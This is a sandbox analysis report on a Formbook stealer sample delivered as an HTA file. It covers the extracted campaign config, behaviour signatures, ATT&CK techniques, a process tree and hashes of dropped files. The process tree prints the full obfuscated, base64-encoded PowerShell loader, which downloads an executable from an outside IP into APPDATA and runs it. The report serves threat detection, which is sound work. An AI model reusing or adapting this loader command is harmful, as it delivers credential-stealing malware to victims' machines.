formbook | 1c7d8ace58257e970e2f7738886c596d8189f85cef9127dba9b324735f506821

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23-09-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f691fb2c2b5183a496711a5b78b575ce.hta
Size

115KB
MD5

f691fb2c2b5183a496711a5b78b575ce
SHA1

ce9603dd85d843e4fd9fa66843f46ca5ece4e260
SHA256

1c7d8ace58257e970e2f7738886c596d8189f85cef9127dba9b324735f506821
SHA512

ce1e7a6b64b0d14d1d42ddf134d5db74aa8a17c6945c32f17829fbce7f309bd8f34ac1d750548c66c1cf4dcbd234531c6f57e354ac5f605331d39a57d9bb11ba
SSDEEP

96:Ea+M7iHLlFPiJSHLqFPiJGkpmfORxcHLoHLDFPiJTHLQcAT:Ea+QiHJFPlHOFPhLHsHfFPmHcT

Score

10^/10

formbook j62t defense_evasion discovery execution rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

j62t

Decoy

qualegacy.shop

ijngblv.top

hop-tiktok.top

nti-aging-66026.bond

ostashqiptare-al.info

faretireltd.info

dra.finance

arden-office-45382.bond

nair.today

dence.tokyo

omoantifragilis.net

eet-new-people-26331.bond

ocfamilyto.llc

roduct-tester-jobs-68513.bond

elestialaurelia.buzz

uzzbuilders.buzz

ryptofaucet.xyz

krfq.shop

jbhu.vip

uemw.top

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

Formbook payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/2400-88-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral2/memory/3608-93-0x0000000000D70000-0x0000000000D9F000-memory.dmp	formbook

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	208	powershell.exe
45	3608	cmstp.exe
48	3608	cmstp.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
208	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
1404	audiodg.exe
2400	audiodg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1404 set thread context of 2400	1404	audiodg.exe	95
PID 2400 set thread context of 3532	2400	audiodg.exe	56
PID 3608 set thread context of 3532	3608	cmstp.exe	56

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	audiodg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmstp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
208	powershell.exe
208	powershell.exe
2400	audiodg.exe
2400	audiodg.exe
2400	audiodg.exe
2400	audiodg.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe
3608	cmstp.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2400	audiodg.exe
2400	audiodg.exe
2400	audiodg.exe
3608	cmstp.exe
3608	cmstp.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	2400	audiodg.exe
Token: SeDebugPrivilege	3608	cmstp.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 3116 wrote to memory of 2652	3116	mshta.exe	82
PID 3116 wrote to memory of 2652	3116	mshta.exe	82
PID 3116 wrote to memory of 2652	3116	mshta.exe	82
PID 2652 wrote to memory of 208	2652	cmd.exe	84
PID 2652 wrote to memory of 208	2652	cmd.exe	84
PID 2652 wrote to memory of 208	2652	cmd.exe	84
PID 208 wrote to memory of 2096	208	powershell.exe	87
PID 208 wrote to memory of 2096	208	powershell.exe	87
PID 208 wrote to memory of 2096	208	powershell.exe	87
PID 2096 wrote to memory of 732	2096	csc.exe	88
PID 2096 wrote to memory of 732	2096	csc.exe	88
PID 2096 wrote to memory of 732	2096	csc.exe	88
PID 208 wrote to memory of 1404	208	powershell.exe	94
PID 208 wrote to memory of 1404	208	powershell.exe	94
PID 208 wrote to memory of 1404	208	powershell.exe	94
PID 1404 wrote to memory of 2400	1404	audiodg.exe	95
PID 1404 wrote to memory of 2400	1404	audiodg.exe	95
PID 1404 wrote to memory of 2400	1404	audiodg.exe	95
PID 1404 wrote to memory of 2400	1404	audiodg.exe	95
PID 1404 wrote to memory of 2400	1404	audiodg.exe	95
PID 1404 wrote to memory of 2400	1404	audiodg.exe	95
PID 3532 wrote to memory of 3608	3532	Explorer.EXE	96
PID 3532 wrote to memory of 3608	3532	Explorer.EXE	96
PID 3532 wrote to memory of 3608	3532	Explorer.EXE	96
PID 3608 wrote to memory of 4652	3608	cmstp.exe	97
PID 3608 wrote to memory of 4652	3608	cmstp.exe	97
PID 3608 wrote to memory of 4652	3608	cmstp.exe	97

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of WriteProcessMemory
PID:3532
- C:\Windows\SysWOW64\mshta.exe
  C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\f691fb2c2b5183a496711a5b78b575ce.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'JGNTRXluWUggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZbGJFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVNU21adlNwVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFlmRWxjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVaSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInN4dGZOYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0lHWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY1NFeW5ZSDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwMy4xMzEuMTMwLjE1NC8xNDQvYXVkaW9kZy5leGUiLCIkZU52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7U3RBclQtc0xFZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[cHaR]34+'))')))"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'JGNTRXluWUggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZbGJFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVNU21adlNwVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFlmRWxjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVaSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInN4dGZOYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0lHWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY1NFeW5ZSDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwMy4xMzEuMTMwLjE1NC8xNDQvYXVkaW9kZy5leGUiLCIkZU52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7U3RBclQtc0xFZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[cHaR]34+'))')))"
      4⤵
      Blocklisted process makes network request
      Evasion via Device Credential Deployment
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:208
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vxcoxog4\vxcoxog4.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2096
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80E8.tmp" "c:\Users\Admin\AppData\Local\Temp\vxcoxog4\CSCE170C81B526140AEBFE05BC93CBAF43.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:732
    - - C:\Users\Admin\AppData\Roaming\audiodg.exe
        
        "C:\Users\Admin\AppData\Roaming\audiodg.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1404
      - C:\Users\Admin\AppData\Roaming\audiodg.exe
        
        "C:\Users\Admin\AppData\Roaming\audiodg.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
- C:\Windows\SysWOW64\cmstp.exe
  "C:\Windows\SysWOW64\cmstp.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Roaming\audiodg.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES80E8.tmp

Filesize
1KB

MD5
b0450471b245c5cf95e4bc06ac4456ec

SHA1
95f20d6d59a8d980ac639234230227e02b582dcf

SHA256
d6bf11d3d82d3b82253ee85a4ba1a00362eb786c7a135426c7b91a14c6b6cb47

SHA512
55dba886500647e647892e6e0db6a286627148cef9dda45d9524e84948eb3dfe413a0090591c1cdf083fc5007cc6f59ccbedfd23f6a9f6987c8683b92ea63396

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dq4yu2qm.2zd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vxcoxog4\vxcoxog4.dll

Filesize
3KB

MD5
dffa2fd8527c74f817b436d39103dbde

SHA1
d08df19769bbe89398893bf6d0f0277a251bb37f

SHA256
08fd979689df487afd068f906d50ab67ae7df7fc41240941a4e4b3e0ce11bdb0

SHA512
f412fb8f2fa4fa3d0b9f086a7c685028c3b58d7ab93bf748b7f426e5e20ec6394fe0239b718355e8c43184bd4597023411a72e92de39af5732944523a75312de

Download Submit
C:\Users\Admin\AppData\Roaming\audiodg.exe

Filesize
770KB

MD5
13026754941320e654b4d10b8c7c37d4

SHA1
0c355a2c24b09bd90e84bc58c842176d0b18569f

SHA256
58cdcd2f49080d4471ffd169eb6cfe86f9efae01e45423492d0e31a4db510d60

SHA512
77cc08168c0a860f56157a0926c7cee8bd18531a85869e38b1fb585e20b03e11c669a7d1a4cf002e7f06a46e8b47411c0393913e161cc05a4717db011b799279

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vxcoxog4\CSCE170C81B526140AEBFE05BC93CBAF43.TMP

Filesize
652B

MD5
28707764d0768645354f0ab2f8d15c9d

SHA1
d477d2d85adfda17ed6017514e4cead266b27029

SHA256
0b5ab44b4ce7cbffa21dae380adad26c89d712a4bac022fb458e355388535c42

SHA512
dd2b2e550908e5a5d1901d4e1a065dcaf96066b80e3c98a7818ae2003adb3332fa0464463d47a16ce81b4301786f1c0f1946ef39250e7b0fd525eb45b74cdc47

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vxcoxog4\vxcoxog4.0.cs

Filesize
467B

MD5
deec2cbeef08f5d6a07a39fd4189249f

SHA1
174ed8f143660c9aba228b6a5dbe05bd39e0372c

SHA256
b670540a59065657d3544089a447a84d4b8a1bc8004be85311d3fff5ae0ea6ad

SHA512
54ffbed2df5ee7fd1a014f58147375bfab9794b1339b18a78d004138926835aea1e99ff3ae35acdcb39a0dda05fdddabec891ad8b1e22f79f3ffa4cf595d452d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vxcoxog4\vxcoxog4.cmdline

Filesize
369B

MD5
d7643073dfd9de601ca3fb36056b686d

SHA1
30ebf51b6e47ff188f88eeb3f756292998e8ef50

SHA256
fb1172d2948d0f7e8c068e762c32826dd62d8730d10e7b934352893d7a7b78f5

SHA512
a19c08b82c280b7d5b3fbd85a035f7b4e76881c1b941dc2efb8f6b0925675f6b35cb655b2f8fee45f2564fdffb78918d2e3e15360cf02e9e9f2d13149157f8bd

Download Submit
memory/208-43-0x0000000007E60000-0x0000000007E7A000-memory.dmp

Filesize
104KB

Download
memory/208-4-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-13-0x00000000062F0000-0x0000000006644000-memory.dmp

Filesize
3.3MB

Download
memory/208-18-0x00000000068A0000-0x00000000068BE000-memory.dmp

Filesize
120KB

Download
memory/208-19-0x00000000068E0000-0x000000000692C000-memory.dmp

Filesize
304KB

Download
memory/208-21-0x000000006DF30000-0x000000006DF7C000-memory.dmp

Filesize
304KB

Download
memory/208-22-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-20-0x0000000007850000-0x0000000007882000-memory.dmp

Filesize
200KB

Download
memory/208-23-0x000000006E2A0000-0x000000006E5F4000-memory.dmp

Filesize
3.3MB

Download
memory/208-33-0x0000000006E80000-0x0000000006E9E000-memory.dmp

Filesize
120KB

Download
memory/208-35-0x0000000007890000-0x0000000007933000-memory.dmp

Filesize
652KB

Download
memory/208-34-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-36-0x0000000008230000-0x00000000088AA000-memory.dmp

Filesize
6.5MB

Download
memory/208-37-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

Filesize
104KB

Download
memory/208-38-0x0000000007C60000-0x0000000007C6A000-memory.dmp

Filesize
40KB

Download
memory/208-39-0x0000000007E80000-0x0000000007F16000-memory.dmp

Filesize
600KB

Download
memory/208-40-0x0000000007DE0000-0x0000000007DF1000-memory.dmp

Filesize
68KB

Download
memory/208-41-0x0000000007E10000-0x0000000007E1E000-memory.dmp

Filesize
56KB

Download
memory/208-42-0x0000000007E20000-0x0000000007E34000-memory.dmp

Filesize
80KB

Download
memory/208-0-0x000000007167E000-0x000000007167F000-memory.dmp

Filesize
4KB

Download
memory/208-44-0x0000000007E50000-0x0000000007E58000-memory.dmp

Filesize
32KB

Download
memory/208-6-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/208-5-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

Filesize
136KB

Download
memory/208-9-0x0000000005BE0000-0x0000000005C46000-memory.dmp

Filesize
408KB

Download
memory/208-3-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-2-0x0000000005CC0000-0x00000000062E8000-memory.dmp

Filesize
6.2MB

Download
memory/208-57-0x0000000007E50000-0x0000000007E58000-memory.dmp

Filesize
32KB

Download
memory/208-59-0x000000007167E000-0x000000007167F000-memory.dmp

Filesize
4KB

Download
memory/208-60-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-61-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-66-0x0000000008120000-0x0000000008142000-memory.dmp

Filesize
136KB

Download
memory/208-67-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/208-68-0x0000000008E60000-0x0000000009404000-memory.dmp

Filesize
5.6MB

Download
memory/208-1-0x00000000032D0000-0x0000000003306000-memory.dmp

Filesize
216KB

Download
memory/208-83-0x0000000071670000-0x0000000071E20000-memory.dmp

Filesize
7.7MB

Download
memory/1404-81-0x0000000000E70000-0x0000000000F36000-memory.dmp

Filesize
792KB

Download
memory/1404-82-0x00000000057E0000-0x0000000005872000-memory.dmp

Filesize
584KB

Download
memory/1404-84-0x0000000005990000-0x000000000599A000-memory.dmp

Filesize
40KB

Download
memory/1404-85-0x0000000005C50000-0x0000000005C62000-memory.dmp

Filesize
72KB

Download
memory/1404-86-0x0000000007140000-0x00000000071B6000-memory.dmp

Filesize
472KB

Download
memory/1404-87-0x0000000009800000-0x000000000989C000-memory.dmp

Filesize
624KB

Download
memory/2400-88-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/3532-97-0x0000000009360000-0x00000000094E4000-memory.dmp

Filesize
1.5MB

Download
memory/3608-92-0x0000000000A40000-0x0000000000A56000-memory.dmp

Filesize
88KB

Download
memory/3608-93-0x0000000000D70000-0x0000000000D9F000-memory.dmp

Filesize
188KB

Download